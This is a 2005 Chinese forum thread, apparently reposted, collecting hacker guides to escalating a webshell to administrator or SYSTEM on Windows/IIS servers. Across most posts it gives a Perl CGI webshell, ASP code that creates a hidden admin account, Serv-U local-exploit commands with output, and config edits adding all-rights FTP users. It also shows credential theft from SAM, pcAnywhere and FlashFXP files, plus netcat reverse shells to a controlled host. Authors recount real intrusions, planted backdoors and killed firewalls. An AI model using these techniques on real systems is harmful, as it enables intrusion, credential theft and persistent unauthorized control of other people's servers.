以文本方式查看主题 - 电白社区 (http://www.525400.net/index.asp) -- 网络与安全 (http://www.525400.net/list.asp?boardid=76) ---- 目前黑客入侵服务器提升权限总结 (http://www.525400.net/dispbbs.asp?boardid=76&id=3073) | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:30:37 -- 目前黑客入侵服务器提升权限总结 通过webshell获得admin全攻略 话说到花了九牛二虎的力气获得了一个webshell, 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 用我新建的用户和密码连接~ 如果提示没有权限,那我们就 存为xx.vbe 唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。 WIN2K+IIS5.0默认情况下应用程序保护选项是“中(共用的)”,这时IIS加载isapi是用的 所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test 加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。 正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了 可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。 下载系统的 %windir%//repair//sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件, 反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:00 -- WEBSHELL权限提升 动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容 autorun.inf 四 REPLACE [drive1:][path1]filename [drive2:][path2] [/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。 [Startup] 将文件scripts.ini保存到“C://winnt//system32//GroupPolicy//Machine//Scripts” | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:14 -- 使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。 其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。 其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。 其三,通过替换系统服务来提升。 其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。 本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:) 本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够 黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版 本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing 图1 于是上传了一个asp的脚本的后门,怎么提升权限呢? 在这个网站的主机上游荡了N分钟,在C:// Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢? 于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了 对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。 说了半天这提升权限的事情一点没讲啊 不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊! 又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。 现在的星号密码会不会也是加了密的?看看就行了呗。 怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧 下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵 密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+ 用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69 (上述部分密码和用户名已经作了必要的修改) 这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。 我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。 <!-- Message body /'/'"" --> | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:29 -- 将asp权限提到最高by: cnqing from:http://friend.91eb.com 本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。 原理: asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system 方法: 第一步。 得到inprocesslsapiapps内容,用命令"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。 第二步 写一个bat内容为"cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" ····· 省略号为复制下的内容。中间用空格分开不要带回车符 最后运行这个bat就行了。 例如: 我用"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"得到 "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll" 那么你的bat就应该是: cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll" 已测试成功!! | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:44 -- 利用%5c绕过验证 | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:32:05 -- 提升权限终极技巧 作者:WekweN http://www.wrsky.com 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C://Documents and Settings//All Users//Application Data//Symantec//pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 ps: 破解工具本站已提供。请自己Search一下! 2.C://WINNT//system32//config进这里下它的SAM,破解用户的密码 用到破解sam密码的软件有LC,SAMinside 3.C://Documents and Settings//All Users//「开始」菜单//程序看这里能跳转不,我们从这里可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=WekweN|1] Password= HomeDir=c:TimeOut=600 Maintenance=System Access1=C://|RWAMELCDP Access1=d://|RWAMELCDP Access1=f://|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 4.c://winnt//system32//inetsrv//data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 c://php, 用phpspy c://prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html//r//n//r//n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f/ig; $execthis = $_; syswrite(STDOUT, "<HTML><PRE>//r//n", 13); open(STDERR, ">&STDOUT") || die "Can/'t redirect STDERR"; system($execthis); syswrite(STDOUT, "//r//n</PRE></HTML>//r//n", 17); close(STDERR); close(STDOUT); exit; 保存为cgi执行, 如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录 http://anyhost//cmd.pl?c//perl//bin//su.exe 返回: Serv-u >3.x Local Exploit by xiaolu USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 现在是 IUSR 权限,提交: http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe e: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe f: /E /T /G everyone:F" 如果返回下面的信息,就表示成功了 Serv-u >3.x Local Exploit by xiaolu <220 Serv-U FTP Server v5.2 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=2 <220 Domain settings saved ****************************************************** [+] Domain xl:2 created [+] Creating Evil User <200-User=xl 200 User settings saved ****************************************************** [+] Now Exploiting... >USER xl <331 User name okay, need password. ****************************************************** >PASS 111111 <230 User logged in, proceed. ****************************************************** [+] Now Executing: cacls.exe c: /E /T /G everyone:F <220 Domain deleted 这样所有分区为everyone完全控制 现在我们把自己的用户提升为管理员: http://anyhost//cmd.pl?c//perl//bin//su.exe " net localgroup administrators IUSR_anyhost /add" 6.可以成功运行"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 用这个cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 再将asp.dll加入特权一族 asp.dll是放在c://winnt//system32//inetsrv//asp.dll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT//system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll""c://winnt//system32//inetsrv//asp.dll" 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 7.还可以用这段代码试提升,好象效果不明显 <%@codepage=936%><%Response.Expires=0 on error resume next Session.TimeOut=50 Server.ScriptTimeout=3000 set lp=Server.createObject("WSCRIPT.NETWORK") oz="WinNT://"&lp.ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob.create("user","WekweN$") od.SetPassword "WekweN" <-----密码 od.SetInfo Set of=GetObject(oz&"/WekweN$,user") oe.Add(of.ADsPath) Response.write "WekweN$ 超级帐号建立成功!"%> 用这段代码检查是否提升成功 <%@codepage=936%> <%Response.Expires=0 on error resume next /'查找Administrators组帐号 Set tN=server.createObject("Wscript.Network") Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") For Each admin in objGroup.Members Response.write admin.Name&"<br>" Next if err then Response.write "不行啊:Wscript.Network" end if %> 8.C://Program Files//Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。 9.最后了,如果主机设置很变态,可以试下在c://Documents and Settings//All Users//「开始」菜单//程序//启动"写入bat,vbs等木马。 等到主机重启或者你ddos逼它重启,来达到权限提升的目的。 总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执" 以上是本人的拙见,大家有什么好的方法多多分享 WekweN 04.12.12 | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:12 -- 如何绕过防火墙提升权限 本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。 废话少说,咱们进入正题。 测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。 思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。 传上了srv.exe和nc.exe在H://long//sun***//lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D://Documents and Settings//All Users//是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。 可以浏览D://program files//serv-u//ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。 不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c://,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。 我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。) 高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H://long//sun***//lemon,再用刚才nc得到的shell把它们copy到d://winnt//system32//下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。 一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D://program files//serv-u//里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。) 不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D://program files//serv-u// ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。 好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以: ftp>quote site exec net user xr rain /add 在webshell上运行net user,就可以看见添加成功了。 整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。 | |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:31 --
| |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:49 -- 巧用asp木马和KV2004得到管理员权限
| |||
-- 作者:小飞 -- 发布时间:2005-2-23 21:34:20 --
|
黑客入侵服务器提升权限总结
最新推荐文章于 2022-06-23 20:18:27 发布